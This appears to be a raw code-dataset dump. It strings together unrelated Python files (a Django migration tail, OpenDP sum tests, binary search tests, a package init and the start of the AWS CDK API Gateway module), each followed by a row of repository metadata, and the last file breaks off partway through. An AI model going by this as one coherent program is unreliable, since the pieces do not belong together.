migrations.AlterField(
model_name='modulegroupsb',
name='prefmaxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='thiskey',
field=models.IntegerField(blank=True, null=True),
),
]
| 32.132075 | 61 | 0.559014 | 288 | 3,406 | 6.524306 | 0.170139 | 0.191591 | 0.239489 | 0.277807 | 0.897286 | 0.897286 | 0.874933 | 0.874933 | 0.874933 | 0.846195 | 0 | 0.009569 | 0.325015 | 3,406 | 105 | 62 | 32.438095 | 0.807743 | 0.020258 | 0 | 0.918367 | 1 | 0 | 0.120276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020408 | 0 | 0.05102 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0846d26c2355670c9268357e53b2b8f3225825f3 | 5,540 | py | Python | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 95 | 2021-02-17T19:50:28.000Z | 2022-03-31T16:50:59.000Z | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 299 | 2021-02-10T00:14:41.000Z | 2022-03-31T16:17:33.000Z | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 13 | 2021-04-01T14:40:56.000Z | 2022-03-27T08:52:46.000Z |
def test_sized_bounded_float_sum():
"""known-n bounded float sum (assuming n is public)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_resize, make_sized_bounded_sum
from opendp.meas import make_base_laplace, make_base_gaussian
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point", "contrib")
size = 200
bounds = (0., 20.)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<Float>>
make_cast(TIA=str, TOA=float) >>
# Impute missing values to 0, emit Vec<Float>
make_impute_constant(constant=0.) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Resize dataset length
make_bounded_resize(size=size, bounds=bounds, constant=0.) >>
# Aggregate with sum
make_sized_bounded_sum(size=size, bounds=bounds)
)
# Add noise such that when d_in=1, the result is 1 epsilon DP
laplace_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_laplace(s),
d_in=1, d_out=1.)
gaussian_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_gaussian(s),
d_in=1, d_out=(1., 1e-5))
assert laplace_known_n_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * size)
print(laplace_known_n_sum_from_dataframe(data))
print(gaussian_known_n_sum_from_dataframe(data))
def test_sized_bounded_int_sum():
"""known-n bounded int sum (assuming n is public)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_resize, make_sized_bounded_sum
from opendp.meas import make_base_geometric
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point", "contrib")
size = 200
bounds = (0, 20)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<int>>
make_cast(TIA=str, TOA=int) >>
# Impute missing values to 0, emit Vec<int>
make_impute_constant(constant=0) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Resize dataset length
make_bounded_resize(size=size, bounds=bounds, constant=0) >>
# Aggregate with sum
make_sized_bounded_sum(size=size, bounds=bounds)
)
noisy_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_geometric(s),
d_in=1, d_out=1.)
assert noisy_known_n_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * size)
print(noisy_known_n_sum_from_dataframe(data))
def test_bounded_float_sum():
"""bounded float sum (assuming n is unknown)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_sum
from opendp.meas import make_base_laplace, make_base_gaussian
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point")
bounds = (0., 20.)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<float>>
make_cast(TIA=str, TOA=float) >>
# Impute missing values to 0, emit Vec<float>
make_impute_constant(constant=0.) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Aggregate with sum. Resize is not necessary with make_bounded_sum, only make_sized_bounded_sum
make_bounded_sum(bounds=bounds)
)
laplace_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_laplace(s),
d_in=1, d_out=1.)
gaussian_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_gaussian(s),
d_in=1, d_out=(1., 1e-5))
assert laplace_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * 100)
print(laplace_sum_from_dataframe(data))
print(gaussian_sum_from_dataframe(data))
def test_bounded_int_sum():
"""bounded int sum (assuming n is unknown)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_sum
from opendp.meas import make_base_geometric
from opendp.mod import binary_search_chain
bounds = (0, 20)
preprocess = (
make_split_dataframe(",", ['A', 'B']) >>
make_select_column("A", TOA=str) >>
make_cast(TIA=str, TOA=int) >>
make_impute_constant(constant=0) >>
make_clamp(bounds=bounds) >>
make_bounded_sum(bounds=bounds)
)
noisy_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_geometric(s),
d_in=1, d_out=1.)
assert noisy_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * 100)
print(noisy_sum_from_dataframe(data))
| 34.197531 | 104 | 0.668592 | 761 | 5,540 | 4.554534 | 0.128778 | 0.040392 | 0.07386 | 0.030006 | 0.919215 | 0.898442 | 0.831218 | 0.811021 | 0.791979 | 0.791979 | 0 | 0.014713 | 0.227076 | 5,540 | 161 | 105 | 34.409938 | 0.794722 | 0.173827 | 0 | 0.717172 | 0 | 0 | 0.018531 | 0 | 0 | 0 | 0 | 0 | 0.040404 | 1 | 0.040404 | false | 0 | 0.121212 | 0 | 0.161616 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f24c4420519d8ff9d3c8219185e76180bf0159bf | 84 | py | Python | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | null | null | null | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | 17 | 2021-08-10T07:37:47.000Z | 2021-11-26T15:11:12.000Z | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | null | null | null | from version_helper.git_tools import Git
from version_helper.version import Version
| 28 | 42 | 0.880952 | 13 | 84 | 5.461538 | 0.461538 | 0.309859 | 0.478873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 84 | 2 | 43 | 42 | 0.934211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f2b173f91c963dd6a9465c220dff490dda645b66 | 505 | py | Python | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | from binary_search import binary_search
def test_binary_search_empty_list():
assert binary_search([], 1) == -1
def test_binary_search_item_found1():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 7) == 6
def test_binary_search_item_found2():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 1) == 0
def test_binary_search_item_found3():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 4) == 3
def test_binary_search_item_not_found():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 8) == -1
| 22.954545 | 56 | 0.665347 | 90 | 505 | 3.422222 | 0.266667 | 0.467532 | 0.211039 | 0.308442 | 0.623377 | 0.324675 | 0.324675 | 0.324675 | 0.324675 | 0.324675 | 0 | 0.099515 | 0.184158 | 505 | 21 | 57 | 24.047619 | 0.648058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.454545 | 1 | 0.454545 | true | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
f2b3c5204126d205c59d67307c205f5de9fefba4 | 782,608 | py | Python | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 41 | 2019-08-22T13:03:42.000Z | 2022-02-24T05:07:32.000Z | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 1 | 2020-06-17T17:44:28.000Z | 2021-02-12T22:40:01.000Z | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 31 | 2019-08-23T17:33:41.000Z | 2022-03-28T09:20:07.000Z | """
## Amazon API Gateway Construct Library
<!--BEGIN STABILITY BANNER-->---

---
<!--END STABILITY BANNER-->
Amazon API Gateway is a fully managed service that makes it easy for developers
to publish, maintain, monitor, and secure APIs at any scale. Create an API to
access data, business logic, or functionality from your back-end services, such
as applications running on Amazon Elastic Compute Cloud (Amazon EC2), code
running on AWS Lambda, or any web application.
### Defining APIs
APIs are defined as a hierarchy of resources and methods. `addResource` and
`addMethod` can be used to build this hierarchy. The root resource is
`api.root`.
For example, the following code defines an API that includes the following HTTP
endpoints: `ANY /, GET /books`, `POST /books`, `GET /books/{book_id}`, `DELETE /books/{book_id}`.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigateway.RestApi(self, "books-api")
api.root.add_method("ANY")
books = api.root.add_resource("books")
books.add_method("GET")
books.add_method("POST")
book = books.add_resource("{book_id}")
book.add_method("GET")
book.add_method("DELETE")
```
### AWS Lambda-backed APIs
A very common practice is to use Amazon API Gateway with AWS Lambda as the
backend integration. The `LambdaRestApi` construct makes it easy:
The following code defines a REST API that routes all requests to the
specified AWS Lambda function:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
backend = lambda.Function(...)
apigateway.LambdaRestApi(self, "myapi",
handler=backend
)
```
You can also supply `proxy: false`, in which case you will have to explicitly
define the API model:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
backend = lambda.Function(...)
api = apigateway.LambdaRestApi(self, "myapi",
handler=backend,
proxy=False
)
items = api.root.add_resource("items")
items.add_method("GET")# GET /items
items.add_method("POST")# POST /items
item = items.add_resource("{item}")
item.add_method("GET")# GET /items/{item}
# the default integration for methods is "handler", but one can
# customize this behavior per method or even a sub path.
item.add_method("DELETE", apigateway.HttpIntegration("http://amazon.com"))
```
### Integration Targets
Methods are associated with backend integrations, which are invoked when this
method is called. API Gateway supports the following integrations:
* `MockIntegration` - can be used to test APIs. This is the default
integration if one is not specified.
* `LambdaIntegration` - can be used to invoke an AWS Lambda function.
* `AwsIntegration` - can be used to invoke arbitrary AWS service APIs.
* `HttpIntegration` - can be used to invoke HTTP endpoints.
The following example shows how to integrate the `GET /book/{book_id}` method to
an AWS Lambda function:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
get_book_handler = lambda.Function(...)
get_book_integration = apigateway.LambdaIntegration(get_book_handler)
book.add_method("GET", get_book_integration)
```
Integration options can be optionally be specified:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
get_book_integration = apigateway.LambdaIntegration(get_book_handler,
content_handling=apigateway.ContentHandling.CONVERT_TO_TEXT, # convert to base64
credentials_passthrough=True
)
```
Method options can optionally be specified when adding methods:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
book.add_method("GET", get_book_integration,
authorization_type=apigateway.AuthorizationType.IAM,
api_key_required=True
)
```
The following example shows how to use an API Key with a usage plan:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
hello = lambda.Function(self, "hello",
runtime=lambda.Runtime.NODEJS_10_X,
handler="hello.handler",
code=lambda.Code.from_asset("lambda")
)
api = apigateway.RestApi(self, "hello-api")
integration = apigateway.LambdaIntegration(hello)
v1 = api.root.add_resource("v1")
echo = v1.add_resource("echo")
echo_method = echo.add_method("GET", integration, api_key_required=True)
key = api.add_api_key("ApiKey")
plan = api.add_usage_plan("UsagePlan",
name="Easy",
api_key=key
)
plan.add_api_stage(
stage=api.deployment_stage,
throttle=[{
"method": echo_method,
"throttle": {
"rate_limit": 10,
"burst_limit": 2
}
}
]
)
```
### Working with models
When you work with Lambda integrations that are not Proxy integrations, you
have to define your models and mappings for the request, response, and integration.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
hello = lambda.Function(self, "hello",
runtime=lambda.Runtime.NODEJS_10_X,
handler="hello.handler",
code=lambda.Code.from_asset("lambda")
)
api = apigateway.RestApi(self, "hello-api")
resource = api.root.add_resource("v1")
```
You can define more parameters on the integration to tune the behavior of API Gateway
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
integration = LambdaIntegration(hello,
proxy=False,
request_parameters={
# You can define mapping parameters from your method to your integration
# - Destination parameters (the key) are the integration parameters (used in mappings)
# - Source parameters (the value) are the source request parameters or expressions
# @see: https://docs.aws.amazon.com/apigateway/latest/developerguide/request-response-data-mappings.html
"integration.request.querystring.who": "method.request.querystring.who"
},
allow_test_invoke=True,
request_templates={
# You can define a mapping that will build a payload for your integration, based
# on the integration parameters that you have specified
# Check: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"application/json": JSON.stringify(action="sayHello", poll_id="$util.escapeJavaScript($input.params('who'))")
},
# This parameter defines the behavior of the engine is no suitable response template is found
passthrough_behavior=PassthroughBehavior.NEVER,
integration_responses=[{
# Successful response from the Lambda function, no filter defined
# - the selectionPattern filter only tests the error message
# We will set the response status code to 200
"status_code": "200",
"response_templates": {
# This template takes the "message" result from the Lambda function, adn embeds it in a JSON response
# Check https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"application/json": JSON.stringify(state="ok", greeting="$util.escapeJavaScript($input.body)")
},
"response_parameters": {
# We can map response parameters
# - Destination parameters (the key) are the response parameters (used in mappings)
# - Source parameters (the value) are the integration response parameters or expressions
"method.response.header._content-_type": "'application/json'",
"method.response.header._access-_control-_allow-_origin": "'*'",
"method.response.header._access-_control-_allow-_credentials": "'true'"
}
}, {
# For errors, we check if the error message is not empty, get the error data
"selection_pattern": "(\n|.)+",
# We will set the response status code to 200
"status_code": "400",
"response_templates": {
"application/json": JSON.stringify(state="error", message="$util.escapeJavaScript($input.path('$.errorMessage'))")
},
"response_parameters": {
"method.response.header._content-_type": "'application/json'",
"method.response.header._access-_control-_allow-_origin": "'*'",
"method.response.header._access-_control-_allow-_credentials": "'true'"
}
}
]
)
```
You can define models for your responses (and requests)
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
# We define the JSON Schema for the transformed valid response
response_model = api.add_model("ResponseModel",
content_type="application/json",
model_name="ResponseModel",
schema={"$schema": "http://json-schema.org/draft-04/schema#", "title": "pollResponse", "type": "object", "properties": {"state": {"type": "string"}, "greeting": {"type": "string"}}}
)
# We define the JSON Schema for the transformed error response
error_response_model = api.add_model("ErrorResponseModel",
content_type="application/json",
model_name="ErrorResponseModel",
schema={"$schema": "http://json-schema.org/draft-04/schema#", "title": "errorResponse", "type": "object", "properties": {"state": {"type": "string"}, "message": {"type": "string"}}}
)
```
And reference all on your method definition.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
# If you want to define parameter mappings for the request, you need a validator
validator = api.add_request_validator("DefaultValidator",
validate_request_body=False,
validate_request_parameters=True
)
resource.add_method("GET", integration,
# We can mark the parameters as required
request_parameters={
"method.request.querystring.who": True
},
# We need to set the validator for ensuring they are passed
request_validator=validator,
method_responses=[{
# Successful response from the integration
"status_code": "200",
# Define what parameters are allowed or not
"response_parameters": {
"method.response.header._content-_type": True,
"method.response.header._access-_control-_allow-_origin": True,
"method.response.header._access-_control-_allow-_credentials": True
},
# Validate the schema on the response
"response_models": {
"application/json": response_model
}
}, {
# Same thing for the error responses
"status_code": "400",
"response_parameters": {
"method.response.header._content-_type": True,
"method.response.header._access-_control-_allow-_origin": True,
"method.response.header._access-_control-_allow-_credentials": True
},
"response_models": {
"application/json": error_response_model
}
}
]
)
```
#### Default Integration and Method Options
The `defaultIntegration` and `defaultMethodOptions` properties can be used to
configure a default integration at any resource level. These options will be
used when defining method under this resource (recursively) with undefined
integration or options.
> If not defined, the default integration is `MockIntegration`. See reference
> documentation for default method options.
The following example defines the `booksBackend` integration as a default
integration. This means that all API methods that do not explicitly define an
integration will be routed to this AWS Lambda function.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
books_backend = apigateway.LambdaIntegration(...)
api = apigateway.RestApi(self, "books",
default_integration=books_backend
)
books = api.root.add_resource("books")
books.add_method("GET")# integrated with `booksBackend`
books.add_method("POST")# integrated with `booksBackend`
book = books.add_resource("{book_id}")
book.add_method("GET")
```
### Proxy Routes
The `addProxy` method can be used to install a greedy `{proxy+}` resource
on a path. By default, this also installs an `"ANY"` method:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
proxy = resource.add_proxy(
default_integration=LambdaIntegration(handler),
# "false" will require explicitly adding methods on the `proxy` resource
any_method=True
)
```
### Deployments
By default, the `RestApi` construct will automatically create an API Gateway
[Deployment](https://docs.aws.amazon.com/apigateway/api-reference/resource/deployment/) and a "prod" [Stage](https://docs.aws.amazon.com/apigateway/api-reference/resource/stage/) which represent the API configuration you
defined in your CDK app. This means that when you deploy your app, your API will
be have open access from the internet via the stage URL.
The URL of your API can be obtained from the attribute `restApi.url`, and is
also exported as an `Output` from your stack, so it's printed when you `cdk deploy` your app:
```
$ cdk deploy
...
books.booksapiEndpointE230E8D5 = https://6lyktd4lpk.execute-api.us-east-1.amazonaws.com/prod/
```
To disable this behavior, you can set `{ deploy: false }` when creating your
API. This means that the API will not be deployed and a stage will not be
created for it. You will need to manually define a `apigateway.Deployment` and
`apigateway.Stage` resources.
Use the `deployOptions` property to customize the deployment options of your
API.
The following example will configure API Gateway to emit logs and data traces to
AWS CloudWatch for all API calls:
> By default, an IAM role will be created and associated with API Gateway to
> allow it to write logs and metrics to AWS CloudWatch unless `cloudWatchRole` is
> set to `false`.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigateway.RestApi(self, "books",
deploy_options={
"logging_level": apigateway.MethodLoggingLevel.INFO,
"data_trace_enabled": True
}
)
```
#### Deeper dive: invalidation of deployments
API Gateway deployments are an immutable snapshot of the API. This means that we
want to automatically create a new deployment resource every time the API model
defined in our CDK app changes.
In order to achieve that, the AWS CloudFormation logical ID of the
`AWS::ApiGateway::Deployment` resource is dynamically calculated by hashing the
API configuration (resources, methods). This means that when the configuration
changes (i.e. a resource or method are added, configuration is changed), a new
logical ID will be assigned to the deployment resource. This will cause
CloudFormation to create a new deployment resource.
By default, old deployments are *deleted*. You can set `retainDeployments: true`
to allow users revert the stage to an old deployment manually.
### Custom Domains
To associate an API with a custom domain, use the `domainName` configuration when
you define your API:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigw.RestApi(self, "MyDomain",
domain_name={
"domain_name": "example.com",
"certificate": acm_certificate_for_example_com
}
)
```
This will define a `DomainName` resource for you, along with a `BasePathMapping`
from the root of the domain to the deployment stage of the API. This is a common
set up.
To route domain traffic to an API Gateway API, use Amazon Route 53 to create an
alias record. An alias record is a Route 53 extension to DNS. It's similar to a
CNAME record, but you can create an alias record both for the root domain, such
as `example.com`, and for subdomains, such as `www.example.com`. (You can create
CNAME records only for subdomains.)
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
route53.ARecord(self, "CustomDomainAliasRecord",
zone=hosted_zone_for_example_com,
target=route53.AddressRecordTarget.from_alias(route53_targets.ApiGateway(api))
)
```
You can also define a `DomainName` resource directly in order to customize the default behavior:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
apigw.DomainName(self, "custom-domain",
domain_name="example.com",
certificate=acm_certificate_for_example_com,
endpoint_type=apigw.EndpointType.EDGE
)
```
Once you have a domain, you can map base paths of the domain to APIs.
The following example will map the URL https://example.com/go-to-api1
to the `api1` API and https://example.com/boom to the `api2` API.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
domain.add_base_path_mapping(api1, base_path="go-to-api1")
domain.add_base_path_mapping(api2, base_path="boom")
```
NOTE: currently, the mapping will always be assigned to the APIs
`deploymentStage`, which will automatically assigned to the latest API
deployment. Raise a GitHub issue if you require more granular control over
mapping base paths to stages.
If you don't specify `basePath`, all URLs under this domain will be mapped
to the API, and you won't be able to map another API to the same domain:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
domain.add_base_path_mapping(api)
```
This can also be achieved through the `mapping` configuration when defining the
domain as demonstrated above.
If you wish to setup this domain with an Amazon Route53 alias, use the `route53_targets.ApiGatewayDomain`:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
route53.ARecord(self, "CustomDomainAliasRecord",
zone=hosted_zone_for_example_com,
target=route53.AddressRecordTarget.from_alias(route53_targets.ApiGatewayDomain(domain_name))
)
```
### Cross Origin Resource Sharing (CORS)
[Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a mechanism
that uses additional HTTP headers to tell browsers to give a web application
running at one origin, access to selected resources from a different origin. A
web application executes a cross-origin HTTP request when it requests a resource
that has a different origin (domain, protocol, or port) from its own.
You can add the CORS [preflight](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Preflighted_requests) OPTIONS HTTP method to any API resource via the `defaultCorsPreflightOptions` option or by calling the `addCorsPreflight` on a specific resource.
The following example will enable CORS for all methods and all origins on all resources of the API:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
apigateway.RestApi(self, "api",
default_cors_preflight_options={
"allow_origins": apigateway.Cors.ALL_ORIGINS,
"allow_methods": apigateway.Cors.ALL_METHODS
}
)
```
The following example will add an OPTIONS method to the `myResource` API resource, which
only allows GET and PUT HTTP requests from the origin https://amazon.com.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
my_resource.add_cors_preflight(
allow_origins=["https://amazon.com"],
allow_methods=["GET", "PUT"]
)
```
See the
[`CorsOptions`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-apigateway.CorsOptions.html)
API reference for a detailed list of supported configuration options.
You can specify defaults this at the resource level, in which case they will be applied to the entire resource sub-tree:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
subtree = resource.add_resource("subtree",
default_cors_preflight_options={
"allow_origins": ["https://amazon.com"]
}
)
```
This means that all resources under `subtree` (inclusive) will have a preflight
OPTIONS added to them.
See [#906](https://github.com/aws/aws-cdk/issues/906) for a list of CORS
features which are not yet supported.
---
This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project.
"""
import abc
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from jsii.python import classproperty
import aws_cdk.aws_certificatemanager
import aws_cdk.aws_elasticloadbalancingv2
import aws_cdk.aws_iam
import aws_cdk.aws_lambda
import aws_cdk.core
__jsii_assembly__ = jsii.JSIIAssembly.load("@aws-cdk/aws-apigateway", "1.18.0", __name__, "aws-apigateway@1.18.0.jsii.tgz")
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ApiKeySourceType")
class ApiKeySourceType(enum.Enum):
HEADER = "HEADER"
"""To read the API key from the ``X-API-Key`` header of a request."""
AUTHORIZER = "AUTHORIZER"
"""To read the API key from the ``UsageIdentifierKey`` from a custom authorizer."""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.AuthorizationType")
class AuthorizationType(enum.Enum):
NONE = "NONE"
"""Open access."""
IAM = "IAM"
"""Use AWS IAM permissions."""
CUSTOM = "CUSTOM"
"""Use a custom authorizer."""
COGNITO = "COGNITO"
"""Use an AWS Cognito user pool."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.AwsIntegrationProps", jsii_struct_bases=[], name_mapping={'service': 'service', 'action': 'action', 'action_parameters': 'actionParameters', 'integration_http_method': 'integrationHttpMethod', 'options': 'options', 'path': 'path', 'proxy': 'proxy', 'subdomain': 'subdomain'})
class AwsIntegrationProps():
def __init__(self, *, service: str, action: typing.Optional[str]=None, action_parameters: typing.Optional[typing.Mapping[str,str]]=None, integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, path: typing.Optional[str]=None, proxy: typing.Optional[bool]=None, subdomain: typing.Optional[str]=None):
"""
:param service: The name of the integrated AWS service (e.g. ``s3``).
:param action: The AWS action to perform in the integration. Use ``actionParams`` to specify key-value params for the action. Mutually exclusive with ``path``.
:param action_parameters: Parameters for the action. ``action`` must be set, and ``path`` must be undefined. The action params will be URL encoded.
:param integration_http_method: The integration's HTTP method type. Default: POST
:param options: Integration options, such as content handling, request/response mapping, etc.
:param path: The path to use for path-base APIs. For example, for S3 GET, you can set path to ``bucket/key``. For lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations`` Mutually exclusive with the ``action`` options.
:param proxy: Use AWS_PROXY integration. Default: false
:param subdomain: A designated subdomain supported by certain AWS service for fast host-name lookup.
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
'service': service,
}
if action is not None: self._values["action"] = action
if action_parameters is not None: self._values["action_parameters"] = action_parameters
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if options is not None: self._values["options"] = options
if path is not None: self._values["path"] = path
if proxy is not None: self._values["proxy"] = proxy
if subdomain is not None: self._values["subdomain"] = subdomain
@property
def service(self) -> str:
"""The name of the integrated AWS service (e.g. ``s3``)."""
return self._values.get('service')
@property
def action(self) -> typing.Optional[str]:
"""The AWS action to perform in the integration.
Use ``actionParams`` to specify key-value params for the action.
Mutually exclusive with ``path``.
"""
return self._values.get('action')
@property
def action_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Parameters for the action.
``action`` must be set, and ``path`` must be undefined.
The action params will be URL encoded.
"""
return self._values.get('action_parameters')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""The integration's HTTP method type.
default
:default: POST
"""
return self._values.get('integration_http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options, such as content handling, request/response mapping, etc."""
return self._values.get('options')
@property
def path(self) -> typing.Optional[str]:
"""The path to use for path-base APIs.
For example, for S3 GET, you can set path to ``bucket/key``.
For lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations``
Mutually exclusive with the ``action`` options.
"""
return self._values.get('path')
@property
def proxy(self) -> typing.Optional[bool]:
"""Use AWS_PROXY integration.
default
:default: false
"""
return self._values.get('proxy')
@property
def subdomain(self) -> typing.Optional[str]:
"""A designated subdomain supported by certain AWS service for fast host-name lookup."""
return self._values.get('subdomain')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AwsIntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class BasePathMapping(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.BasePathMapping"):
"""This resource creates a base path that clients who call your API must use in the invocation URL.
In most cases, you will probably want to use
``DomainName.addBasePathMapping()`` to define mappings.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: "IDomainName", rest_api: "IRestApi", base_path: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param domain_name: The DomainName to associate with this base path mapping.
